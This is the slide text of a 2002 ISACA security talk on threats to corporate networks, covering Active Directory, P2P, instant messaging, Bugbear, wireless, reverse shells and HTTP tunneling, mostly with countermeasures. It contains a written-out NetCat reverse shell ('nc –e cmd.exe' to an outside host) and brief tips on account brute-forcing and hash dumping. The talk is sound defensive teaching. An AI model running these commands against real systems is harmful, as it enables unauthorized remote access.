2002-11-20-ISACA-ModernThreats
advertisement
Analysts International Modern Threats to Information Infrastructure V1.0 11-20-02 Introductions • Mark Lachniet from Analysts International, Sequoia Services Group • Senior Security Engineer and Security Services technical lead • Former I.S. director for Holt Public Schools • Certified Information Systems Security Professional (CISSP) • Microsoft MCSE, Novell Master CNE, Linux LPI Certified LPIC-1, Check Point Certified CCSE, TruSecure TICSA, etc. 2 Agenda • • • • • • • • Windows 2000 Active Directory Peer to Peer file sharing Instant Messaging Bug Bear Wireless Reverse command shells HTTP Tunneling / GoToMyPC.com Round table – Q&A – Brainstorming 3 Active Directory Overview • Active directory is the directory service for Win2k • NT 4.0 domains simply did not scale very well in large organizations, A.D. is distributed • By default, all of the old NetBIOS stuff is still running, but there are new capabilities • Improves management, especially with user and machine policies, delegation of authority functions, and integrated software such as Exchange • Tight integration with DNS (Dynamic DNS) • Tight integration with LDAP (Lightweight Directory Access Protocol) • Integration with Kerberos (Authentication) 4 Hierarchical Directories 5 Pre-Win2k Compatibility Mode • Is required for a variety of backwards-compatibility features • Is probably enabled in your environment unless you are ALL Windows 2000 • Allows access to all of the information you used to get via NetBIOS (shares, users, etc.) • An Active Directory server will emulate a PDC for Windows NT4 type environments and systems • If selected, the “everyone” group is given permissions to read the directory, etc. (just like NT4) and hence anonymous access is allowed • Will be required to interoperate with various products such as UNIX SAMBA, NT4.0 RAS servers, etc. 6 A.D. Default Configuration • Logging of A.D. activity is disabled by default • Also, authenticated users are able to enumerate the entire directory • In a large company, you may wish to lock down your directory so that users in an OU (such as engineering) cannot enumerate objects in another OU (such as internal auditing) • For details on how to lock down this browsing of OU’s and A.D. information check out: www.microsoft.com/serviceproviders/deployme nt/ SP_AD_Architecture_Configuration.doc 7 A.D. and Security Policies • Although not discussed in this presentation, A.D. is the means by which security policy is passed down to workstations and users • Policies are based on domain, which may be an entire A.D. tree or just a sub-component (the relationship between A.D. and Domains may be murky at first glance) • Lots of information is available on the Internet about the config and use of policies • I suggest that you refer to the NSA security guides on this topic: http://www.nsa.gov/snac/index.html 8 Active Directory - LDAP • Based on the X.500 Directory Access Protocol, and is similar to Novell NDS and other X.500 compliant directories in terms of naming conventions, etc. • Win2k supports LDAP v2 and v3 • Should be compatible with other LDAP implementations, both server and client • Runs on TCP/389 (you should portscan your internal and external network for this port) • Uses cleartext authentication by default • v3 support includes SASL (Simple Authentication Security Layer) authentication which supports encryption through NTLM or Kerberos • Many client applications that access LDAP stores for passwords can be forced to only use NTLM (this is a good idea) 9 LDAP Tricks – ADSI Edit • ADSI Edit allows raw access to the directory – this is required for complicated operations but is also very dangerous • Using the ADSI you can do a large variety of things in an “easy” way via scripting as well as the editor • “Active Directory Service Interfaces (ADSI) enable systems administrators and developers of scripts or C/C++ applications to easily query for and manipulate directory service objects.” • ADSI can access Active Directory, but lots of other handy stuff as well • Extensive information on this at Microsoft’s Developer Network web site (MSDN) 10 LDAP Tricks – ADSI Scripting • ADSI supports many scripting capabilities: – Enumerating objects, finding information – Adding users, creating custom objects (such as an object that shows the time of last backup) – Finding users with specific criteria: • • • • Account disabled Intruder lockout Password not required Password can’t change – Also the ability to *SET* information • “un-lockout” an account (handy for brute forcing a password on a specific account, isn’t it?) • Add/remove users from group (add as an admin, run a command, remove user again!) 11 LDAP Brute Force Attacks • http://www.phenoelit.de/kold/download.html • Specifically designed to attack LDAP, with support for Active Directory on Windows 2000 • Can be used to enumerate all ID’s found in the directory and brute force attack them with words from a dictionary file • Can use an anonymous connection, or log in using a given user ID and password • Account lockout / logging of LDAP attacks (brute force, etc) may be an issue that needs more research • Phenoelit also has “lumberjack” which will do off-line hacking of LDAP directories (stored in LDIF format) 12 K0ld Screen Capture 13 Ldapminer.exe on Win2k • Allows full enumeration of the data contained within LDAP (Active Directory) • Can dump all of the data discovered to a text file for later analysis in ldif format (see last slide – lumberjack) • Default Windows 2000 configuration will reveal some useful information: – – – – Current system time X.500 naming (may indicate corporate config) DNS names and IP addresses (including internal) If it is a global catalog (implies 1st AD server but may have implications for Exchange or other penetration testing) 14 A.D. and L0phtCrack • L0phtCrack *will* work on Windows 2000 Active Directory information • Uses PWDUMP3 to extract the hashes, as long as you have admin access • Can access the hashes across the network, and may not require physical access • All of your favorite auditing tricks should still work fine with L0phtCrack, but you will need admin access • One significant change is that it is no longer possible to steal the entire domain account list by booting to a floppy disk and grabbing the SAM file from the hard drive • One trivia fact – did you know that L0phtCrack cannot crack high-bit characters (such as ALTKeypad 0,1,2) 15 A.D. and Kerberos • Kerberos is the updated authentication system for Windows 2000 • Kerberos is an open standard, and other implementations exist (and are somewhat compatible with Win2k) • Windows 2000 clients will attempt to use Kerberos by default, and will downgrade to lesser authentication systems (such as NTLMv2) if there are problems • In Kerberos, a “realm” is a logical network boundry, which correlates 1:1 with a Windows domain. • This means that a Kerberos realm does not necessarily map to an Active Directory tree • Be aware of this relationship, especially if you interoperate with UNIX systems, etc. 16 A.D. and Dynamic DNS • Windows Active Directory relies on Dynamic DNS • There is a logical link between DNS naming and the directory structure • Windows 2000 clients will update their DNS name (e.g. workstation.isaca.org) with their current IP address by means of the DHCP client service • Dynamic DNS supports secure and insecure modes – if you rely on DNS naming for important security functions this should be researched • Dynamic DNS is handy for auditors to find workstations in a DHCP environment, but it is also useful for hackers • One personal observation is that the Dynamic DNS information is exposed in the LDAP directory, even to unauthenticated users. • Also, keep in mind that DNS may allow for zone transfers, enumeration and other reconnaissance 17 Active Directory Auditing • You must manually enable logging and auditing for Active directory • Enable auditing of all failed accesses of Active Directory as well as logins, etc. • For very granular auditing (possibly through scripts or for troubleshooting purposes) Use DSACLS and ACLDIAG • DSACLS.EXE “facilitates management of access control lists (ACLs) for directory services. DsAcls enables you to query and manipulate security attributes on Active Directory objects. It is the command-line equivalent of the Security page on various Active Directory snap-in tools” 18 Active Directory Auditing • With ACLDIAG.EXE you can: • Compare the ACL on a directory services object to the permissions defined in the schema defaults. • Check or fix standard delegations performed using templates from the Delegation of Control wizard in the Active Directory Users and Computers snap-in, a Windows 2000 administrative tool. • Get effective permissions granted to a specific user or group, or to all users and groups that show up in the ACL. 19 Theoretical Attacks on Active Directory • According to the SANS writeup (see references), one dangerous possibility is embedding binary “blobs” in the directory that are executed by MMC • Denial of Service – rapidly changing large numbers of objects, and then setting them as being high priority (critical) for replication • Use of A.D. as Virus distribution system • Modifying the schema in an inappropriate way • Deeply nested OU objects? • Mysterious problems – in testing, my LDAP server frequently froze up while using standard tools 20 Backing up Active Directory • In order to have AD security, you should make sure that it is properly backed up • Restoring AD can be challenging and complicated – make sure you have researched it before you try Backing up the Active Directory also includes backing up system state data files. System state data files includes: – – – – – – – Active Directory Certificate services database (if a certificate server) Class registration (database of information about the component services) Cluster service (if installed) Performance counter configuration Registry Sysvol (shared folder that contains group policy templates, and login scripts) – System startup files. 21 Active Directory References • SecurityFocus article on A.D: http://online.securityfocus.com/infocus/1292 http://online.securityfocus.com/infocus/1293 http://online.securityfocus.com/infocus/1470 http://online.securityfocus.com/infocus/1509 http://online.securityfocus.com/infocus/1535 • Preventing L0phtCrack attacks on A.D http://rr.sans.org/win2000/l0phtcrack.php 22 More A.D. References • A comparison of NT4 domains and Win2k A.D. http://www.microsoft.com/mspress/books/sampchap/3173.asp • How to set up auditing of Active Directory: http://www.softheap.com/security/audit-active-directory-4.html • Using LDP to find data in Active Directory http://support.microsoft.com/default.aspx?scid=KB;enus;q224543 • Discussion on Pre-Windows 2000 Compatibility Mode: http://support.microsoft.com/default.aspx?scid=KB;enus;q257988 23 Peer to Peer File Sharing • • • • • • • • • Several different networks and clients: Aimster FastTrack iMesh Audiogalaxy MFTP NeoModus Gnutella OpenNap 24 Peer to Peer File Sharing • The most popular network by far is Gnutella • Gnutella has many different clients including: • • • • • • • • • • BearShare* Gnucleus GTK-Gnutella LimeWire Mactella Morpheus* Phex Qtella Shareaza* XoLoX • Different clients have different features, systems and risks 25 P2P File Sharing History • Napster was the first successful and important one, but napster made one mistake • Napster used centralized servers that were under their control • Hence the system could be shut down by going after Napster with legal action • Newer systems have “master” nodes, but all they do is maintain lists of other peers out on the network • Master nodes are replaceable – you could start your own P2P network by setting up your own master servers 26 Napster-Style P2P • This wasn’t too bad, at least you knew what to block 27 Gnutella Style P2P • This is *bad* for you because there is no single choke point to cut off 28 P2P File Share Features • Keyword searching • Rate limiting / Quality of Service (via bandwidth or simultaneous upload and download limits) • Request queuing at the serving host • Chat facilities • Use SHA hashes of files to uniquely ID: – SHA hashes are unique by file – ID’s files that are the same but have different names – Allows for “swarm” downloads where parts of the same file are downloaded from multiple sources simultaneously (cool) – Allows for file resumption if a source is unavailable (turned off, hung up, etc.) – Allows for a patient person to get almost anything they can find listed 29 Gnutella Communications • Uses 5 distinct types of protocol messages: ping, pong, query, query reply, and push • Use Shareaza to get a good protocol analyzer / decoder to see them • Ping and Pong discovery – ask who is out there, return IP address and amount of shared files • Query and Query reply – gives search terms (keywords) and minimum bandwidth requirements. Reply gives IP address, port, speed, matching files and GUID of querier • Querier then connects to the server and attempts to download the file (this will break if the server is behind a firewall) • The Push message is sent if the querier cannot connect to the server to download the data 30 Push – Firewall Circumvention • Sends the querier’s IP and port number and asks the file host to push the file to it – this will bypass a single firewall in the mix • If both parties are behind a firewall you are probably safe… For now… • How can you stop it? Use a firewall to block *all* outgoing communications • Require a proxy server to mediate all requests outwards (Squid, MS-PROXY, Border Manager) • Its only a matter of time before P2P clients can tunnel within HTTP requests that are “proxy friendly” • Can already be done with special (but thankfully complicated) HTTP tunneling software • For Gnutella, you can block the “root” servers but an alternate could always be used 31 P2P File Share Security Risks • Spyware Spyware Spyware! • Usually no virus scanning is done – you need to do your own • Spoofed servers will cough up Trojans for almost any simple query (like the Benjamin Worm) • Sharing of more than you intended • “transit” sharing of naughty files has been hinted at! • Security holes (intentional or not) in the software itself • Program minimizes (not shuts down) when exited • P2P specific worms (e.g. the “Gnutella Worm”) • Content problems and liability! • Bandwidth leeching 32 Future P2P Risks • A lot of things about P2P are “dicey” but haven’t yet been exploited • For example, the GUID is a unique identifies that is sometimes based on MAC address! (pre win2k it is said) • That means that queries can possibly be tracked to a unique physical workstation • A monitoring station could also record queries by GUID/MAC as well as IP address and attempt to ascertain information about that user (such as sexual preferences, areas of interest, etc) • Great possibility for leveraging P2P network as Denial of Service zombies by tricking all Gnutella clients into flooding a host (e.g. whitehouse.gov) 33 P2P “NG” Share Sniffer • Operates under the creed of “who needs Napster when you have Windows” • Scans a subnet for “open” windows shares and create a database of them • These open shares are then used as the storage repositories for various types of files • This product used to be at sharesniffer.com but is gone now. I wonder why • This was allegedly going to be a pay service! • Due the lack of awareness on the part of home users, this will probably work quite well 34 Instant Messaging • IM is everywhere, including my cell phone! (although I don’t use it) • Over 81 MILLION users • Check out: http://www.infosecuritymag.com/2002/aug/cover.shtml • Various types of clients: AOL, ICQ, Microsoft .NET Messenger, Yahoo Messenger, etc. • Specifically designed to get around firewalls in order to work • Require servers for some functions (login, user lookup) but can talk directly to nodes for some things (such as file transfers) 35 36 Problems with IM • Bypasses gateway AntiVirus products • Typically unencrypted • Security problems in the software itself -many previous hacks, probably many more to come • May allow remote-control of machines inside the firewall • Ability to send files, URLs, etc. to individuals • Hard to stop at the firewall • Hard to track, log and account for • No robust authentication systems • Secure IM costs $$ and may require an ongoing service contract or your own server 37 Instant Messaging Problems Case in Point - msgsnarf • Dug Song released a number of network sniffing tools at http://monkey.org/~dugsong/dsniff • These are especially interesting because of their special features! • One feature is that it will work on a switch by using “ARP poisoning” such that even switched networks are vulnerable to sniffing • Another feature is the inclusion of application-specific sniffers such as mailsnarf (all SMTP messages), webspy (all URLs) and msgsnarf (Instant Message information) • This might have a “white-hat” application, actually, if you need to monitor it 38 IM management Techniques • Use an IDS to alert you to matching traffic (and then go gently inform the user) • Block access to the login servers and ports (refer to infosecurity magazine’s August issue for details) • Tightly control the workstation using imaging and desktop security products • Require the use of proxy servers (only works in some cases – disable CONNECT on proxy) • Use a specialized product to manage and control the access such as Akonix – this product can log and control IM and P2P software 39 Bug Bear • Known as W32.Bugbear or I-Worm.Tanatos • Some key subject lines: – – – – “bad new” “Membership Confirmation” “Market Update Report” “Your Gift” • Replicates through address book • Copies itself on available network shares including printers! (if you see binary garbage on a printer, this may be a sign) • Includes Trojan software: – Disable AntiVirus software – Built in key-logger – Back door software 40 Bug Bear • Exploits an OLD (may 16, 2001) bug in IE and Outlook, addressed by MS01-027 • Copies several files to the filesystem and then runs them at each startup by modifying the registry • HKLM\Software\Microsoft\Windows\CurrentVersion \RunOnce • Runs a keylogger that sends all of your keystrokes (including passwords) to one of 22 different e-mail addresses • Creates a trojan / backdoor that runs on port 36794 – might want to check FW logs for that • Also has its own web server that it can start up remotely to abuse a system 41 Wireless • Yes, wireless is insecure…. Especially anything you purchased less than 6 months ago and didn’t use another means of security (like a VPN) • Until recently, the only security that you could get from the wireless Access Points (APs) was Wired Equivalency Protection (WEP) • WEP comes in 64bit and 128bit security features, neither of which will do you any good at all if someone really wants to get you • Newer products have much better security and support for better authentication systems (including bi-directional authentication to minimize the risk of “rogue” access points) 42 Wireless • Wardriving – people thing its fun, its cheap, and in some cases a sport • Wireless leaks – connections can be made from physical locations outside of your control by using special hardware and software • Omnidirectional magnetic-mount antennas, directional antennas, and even pringles cans do a pretty good job of picking up signals you never thought possible • Not only can anyone find your network, but they can (probably) tell what your SSID is, if you use WEP, and what vendor your equipment is 43 Wireless • Above and beyond that, modern software integrates with a GPS over a serial port to record the longitude and latitude of your AP • When posted on the internet, your dirty laundry is aired out for all to see • Check out http://www.netstumbler.com for lots of great information • Try it out yourself, you may be surprised • War driving is not, in itself, illegal! However, if you ever use an AP without permission, that is over the line. 44 From Work to Home 9 Access Points in 15 Minutes 45 Wireless Security Measures • There are many things you can do • Put access points on a special DMZ segment on a firewall and restrict traffic • Require users to use a VPN client to access internal resources • Use a modern authentication system such as 802.1X (in Windows XP) and/or LEAP • These systems can require a successful authentication (for example to a Radius server) before allowing a user to associate with an access point • Can also require MUTUAL authentication between the AP and client in addition to user authentication • If this didn’t exist, you could use a MitM (Man in the Middle) attack to get auth info by setting up your own “rogue” AP 46 Wireless Security Measures • Regularly scan and war-drive your own facilities and companies • Consider tuning an IDS for wireless attack signatures (there was a recent article on this) • Consider putting up a wireless honeypot system • Consider using a wireless “flooding” system that sends out huge quantities of random Access Point information to confuse (and delight) War Drivers 47 Reverse Command Shells • One would think that if you block all incoming access, it should be impossible to access internal systems • This is only partially true, because it assumes that the client is honest • With P2P, IM and everything else, this is clearly not the case any more – we cannot trust our users to be security minded • Reverse command shells, e.g. the NetCat attack are particularly scary • Using a utility program such as NetCat, even a Windows server can be accessed from an outside server 48 How Reverse Shells Work • Imagine the above scenario. Lachniet.com cannot hit anything on the inside network directly because you have a firewall, a 10.X network, and no direct Network Address Translation but the client has Internet access 49 How Reverse Shells Work • Hacker runs NetCat in Listen mode on port 8080 on lachniet.com (netcat –l –p 8080) • Client runs NetCat with an argument of cmd.exe and directs all output to lachniet.com port 8080 (nc –e cmd.exe lachniet.com 8080) 50 How Reverse Shells Work • The result – full access as logged in user • To stop it – no outgoing access! • Except by proxy server 51 HTTP Tunneling • It used to be that a firewall, when properly configured, would stop clients from doing naughty things (like reverse command shells) • Ideally we would block all outgoing access, and allow only web access through a HTTP proxy server • This is all well and good, but it is also possible to encapsulate non-HTTP data inside of HTTP requests and data, and then pass that data down to lower layers of the OSI model • In this way, even the most paranoid countermeasures can be circumvented including a restrictive firewall and a proxy server • Technically speaking, it looks something like this: 52 HTTP Tunneling in Practice • Client wants to run a P2P file sharing client • Dotted lines are HTTP traffic, Solid line is TCP 53 GoToMyPC.com • Basically the same thing, except you are using a pay service for your HTTP tunnel termination • The service also acts as a broker for who can connect to your PC • Hopefully this broker is working properly and the average hacker CANNOT connect to your PC (note that I have seen some discussion of WebEx conferencing having vulnerabilities along these lines) • You also get more control and presumably security through SSL, reporting, users and groups and such 54 HTTP Tunneling Counter-measures • Block *all* outgoing traffic at a firewall, and require all traffic to go through a proxy server • Use a firewall with strict RFC compliance (I heard of some reported success with Raptor/Symantec?) • Make sure your proxy server doesn’t allow the CONNECT verb • Configure an IDS to sense certain types of HTTP tunneling signatures (RealSecure can detect gotomypc.com traffic signatures) • Block all known destination servers such as those from the gotomypc.com service • Carefully review your firewall and proxy server logs! If you see a large amount of HTTP activity going to a single host (especially one that doesn’t seem legit) check it out – go browse it yourself • Log review may be your only recourse! 55 Q&A and Brainstorming Mark Lachniet, Sr. Security Engineer CISSP, MCNE, MCSE, CCSE, LPIC-1, TICSA Analysts International - Sequoia Services 3101 Technology Blvd. Suite A Lansing, MI 48910 phone: 517.336.1004 fax: 517.336.1004 56
